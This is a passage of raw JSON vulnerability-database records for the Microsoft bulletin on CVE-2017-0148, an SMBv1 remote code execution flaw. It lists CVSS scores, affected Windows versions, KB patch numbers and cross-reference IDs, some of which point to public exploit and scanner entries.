"RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-18T18:44:54", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-18T18:44:54", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KBMS16-110, 3187754", "KB3212646", "KB3210721", "KB4012598", "KB4013198", "KB4012215", "KB3205401", "KB4012606", "KB4012213", "KB3213986", "KB4012216", "KB4012217", "KB3210720", "KB4012212", "KB4012214", "KB3205409", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-18T18:44:54", "differentElements": ["msAffectedSoftware"], "edition": 59}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-19T00:58:24", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-33895"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-19T00:58:24", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-19T00:58:24", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB3205409", "KB4012212", "KB4012213", "KB3212646", "KB3210720", "KB3177186", "KB4012606", "KB4012214", "KB3213986", "KB4012217", "KB4012215", "KB3210721", "KB4013429", "KB4012598", "KB4013198", "KB3205401", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T00:58:24", "differentElements": ["msAffectedSoftware"], "edition": 60}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-19T08:49:10", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-19T08:49:10", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-19T08:49:10", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3177186", "KBMS16-110, 3187754", "KB3212646", "KB4013198", "KB4012215", "KB4012217", "KB4012213", "KB4013429", "KB3210721", "KB4012212", "KB4012606", "KB3213986", "KB3205409", "KB3210720", "KB4012216", "KB4012214", "KB4012598", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": 